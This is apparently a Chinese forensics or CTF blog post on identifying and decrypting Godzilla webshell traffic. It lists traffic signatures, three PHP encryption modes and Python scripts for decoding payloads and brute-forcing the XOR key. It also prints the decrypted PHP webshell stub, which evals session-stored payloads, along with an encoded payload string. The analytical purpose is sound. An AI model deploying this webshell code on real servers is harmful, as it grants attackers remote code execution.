哥斯拉流量PHP加密方式详解及密钥爆破技术<\/h1>

一、哥斯拉流量识别特征<\/h2>

1. 流量行为特征<\/h3>
先上传小马，后上传大马<\/li>
请求头无Cookie，响应头出现Set-Cookie<\/li>
后续请求包特征：
Cookie尾部有分号（强特征）<\/li>
请求体前后有16位固定数字<\/li>
Accept字段为：Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8<\/code>（弱特征，可修改）<\/li>
响应体Cache-Control: no-store, no-cache, must-revalidate<\/code>（弱特征）<\/li>
<\/ul>
<\/li>
<\/ul>
二、PHP加密方式识别与解密<\/h2>
1. PHP_XOR_BASE64<\/h3>
识别特征<\/strong>：<\/p>

请求体参数值为密文<\/li>
响应体第二行的前和尾部是16个十六进制字符<\/li>
<\/ul>
解密方法<\/strong>：<\/p>

需要知道密码和密钥<\/li>
密钥生成方式：某明文进行MD5加密后取前16个字符<\/li>
推荐工具：Decode_Tools_v1.0-1.0-SNAPSHOT.jar<\/li>
<\/ol>
2. PHP_EVAL_XOR_BASE64<\/h3>
识别特征<\/strong>：<\/p>

请求体参数值为明文<\/li>
响应体前和尾部是16个十六进制字符<\/li>
<\/ul>
解密方法<\/strong>：<\/p>

对请求体参数值进行：

URL解码<\/li>
字符串反转<\/li>
Base64解码<\/li>
<\/ul>
<\/li>
示例Python代码：<\/li>
<\/ol>
import<\/span> base64
<\/span><\/span>import<\/span> urllib.parse
<\/span><\/span>
<\/span><\/span>encoded_string =<\/span> 'K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7ciMmVDMjVDZ4AjMxYzNiNzNn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7ciclt2YhhGaoh2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD'<\/span>
<\/span><\/span>
<\/span><\/span>url_decoded =<\/span> urllib.<\/span>parse.<\/span>unquote(encoded_string)
<\/span><\/span>reversed_string =<\/span> url_decoded[::-<\/span>1<\/span>]
<\/span><\/span>base64_decoded =<\/span> base64.<\/span>b64decode(reversed_string)
<\/span><\/span>
<\/span><\/span>try<\/span>:
<\/span><\/span>    decoded_command =<\/span> base64_decoded.<\/span>decode('utf-8'<\/span>)
<\/span><\/span>    print("解码后的命令:"<\/span>, decoded_command)
<\/span><\/span>except<\/span> UnicodeDecodeError<\/span> as<\/span> e:
<\/span><\/span>    print("解码失败,可能是非 UTF-8 编码:"<\/span>, e)
<\/span><\/span><\/code><\/pre>3. PHP_XOR_RAW<\/h3>
识别特征<\/strong>：<\/p>

请求体为原始数据<\/li>
请求体出现Cookie有分号<\/li>
Cache-Control: no-store, no-cache, must-revalidate<\/code><\/li>
Content-Length: 0<\/code><\/li>
<\/ul>
解密后示例<\/strong>：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>@<\/span>session_start<\/span>();
<\/span><\/span>@<\/span>set_time_limit<\/span>(0<\/span>);
<\/span><\/span>@<\/span>error_reporting<\/span>(0<\/span>);
<\/span><\/span>function<\/span> encode<\/span>($D,$K){
<\/span><\/span>    for<\/span>($i=<\/span>0<\/span>;$i<<\/span>strlen<\/span>($D);$i++<\/span>) {
<\/span><\/span>        $c =<\/span> $K[$i+<\/span>1<\/span>&<\/span>15<\/span>];
<\/span><\/span>        $D[$i] =<\/span> $D[$i]^<\/span>$c;
<\/span><\/span>    }
<\/span><\/span>    return<\/span> $D;
<\/span><\/span>}
<\/span><\/span>$payloadName=<\/span>'payload'<\/span>;
<\/span><\/span>$key=<\/span>'3c6e0b8a9c15224a'<\/span>;
<\/span><\/span>$data=<\/span>file_get_contents<\/span>("php:\/\/input"<\/span>);
<\/span><\/span>if<\/span> ($data!==<\/span>false<\/span>){
<\/span><\/span>    $data=<\/span>encode<\/span>($data,$key);
<\/span><\/span>    if<\/span> (isset<\/span>($_SESSION[$payloadName])){
<\/span><\/span>        $payload=<\/span>encode<\/span>($_SESSION[$payloadName],$key);
<\/span><\/span>        if<\/span> (strpos<\/span>($payload,"getBasicsInfo"<\/span>)===<\/span>false<\/span>){
<\/span><\/span>            $payload=<\/span>encode<\/span>($payload,$key);
<\/span><\/span>        }
<\/span><\/span>        eval<\/span>($payload);
<\/span><\/span>        echo<\/span> encode<\/span>(@<\/span>run<\/span>($data),$key);
<\/span><\/span>    }else<\/span>{
<\/span><\/span>        if<\/span> (strpos<\/span>($data,"getBasicsInfo"<\/span>)!==<\/span>false<\/span>){
<\/span><\/span>            $_SESSION[$payloadName]=<\/span>encode<\/span>($data,$key);
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>三、PHP_XOR_BASE64密钥爆破技术<\/h2>
1. 爆破前提条件<\/h3>

已知密码<\/li>
已知响应体返回的前16位是固定的<\/li>
<\/ul>
2. 爆破思路<\/h3>

通过字典爆破可能的密钥明文<\/li>
对每个候选明文：

计算MD5并取前16位作为候选密钥<\/li>
使用密码和候选密钥尝试解密<\/li>
<\/ul>
<\/li>
当解密结果中出现特定字符串（如e71f50e9773b23f9<\/code>）时，说明找到了正确的密钥明文<\/li>
<\/ol>
3. 示例爆破代码<\/h3>
import<\/span> hashlib
<\/span><\/span>
<\/span><\/span>def<\/span> read<\/span>(path):
<\/span><\/span>    with<\/span> open(path, 'r'<\/span>) as<\/span> file:
<\/span><\/span>        ap =<\/span> [line.<\/span>strip() for<\/span> line in<\/span> file if<\/span> line.<\/span>strip()]
<\/span><\/span>    return<\/span> ap
<\/span><\/span>
<\/span><\/span>def<\/span> encode<\/span>(D, K):
<\/span><\/span>    encoded =<\/span> list(D)
<\/span><\/span>    for<\/span> i in<\/span> range(len(D)):
<\/span><\/span>        c =<\/span> K[(i +<\/span> 1<\/span>) &<\/span> 15<\/span>]
<\/span><\/span>        encoded[i] =<\/span> chr(ord(D[i]) ^<\/span> ord(c))
<\/span><\/span>    return<\/span> ''<\/span>.<\/span>join(encoded)
<\/span><\/span>
<\/span><\/span>def<\/span> main<\/span>():
<\/span><\/span>    passphrase =<\/span> 'Antsword'<\/span>
<\/span><\/span>    ap =<\/span> read('.\/a.txt'<\/span>)
<\/span><\/span>    
<\/span><\/span>    for<\/span> p in<\/span> ap:
<\/span><\/span>        ff =<\/span> hashlib.<\/span>md5((passphrase +<\/span> hashlib.<\/span>md5(p.<\/span>encode()).<\/span>hexdigest()[:16<\/span>]).<\/span>encode()).<\/span>hexdigest()[:16<\/span>]
<\/span><\/span>        if<\/span> ff ==<\/span> "e71f50e9773b23f9"<\/span>:
<\/span><\/span>            print(p)
<\/span><\/span>            print(hashlib.<\/span>md5(p.<\/span>encode()).<\/span>hexdigest()[:16<\/span>])
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>:
<\/span><\/span>    main()
<\/span><\/span><\/code><\/pre>4. 爆破成功结果<\/h3>

密钥明文：Antsw0rd<\/code><\/li>
密钥生成方式：hashlib.md5("Antsw0rd".encode()).hexdigest()[:16]<\/code><\/li>
实际密钥：a18551e65c48f51e<\/code><\/li>
<\/ul>
四、总结<\/h2>


哥斯拉流量有三种PHP加密方式，各有不同的识别特征<\/p>
<\/li>

PHP_EVAL_XOR_BASE64可直接解密获取密码和密钥<\/p>
<\/li>

PHP_XOR_BASE64在已知密码情况下可通过爆破获取密钥<\/p>
<\/li>

爆破关键点：<\/p>

需要准备合适的字典文件<\/li>
依赖响应体固定特征作为验证条件<\/li>
注意密钥是明文的MD5前16位<\/li>
<\/ul>
<\/li>

实际应用中，建议结合流量特征和加密方式特点进行针对性分析，优先尝试已知密码的爆破方法。<\/p>
<\/li>
<\/ol>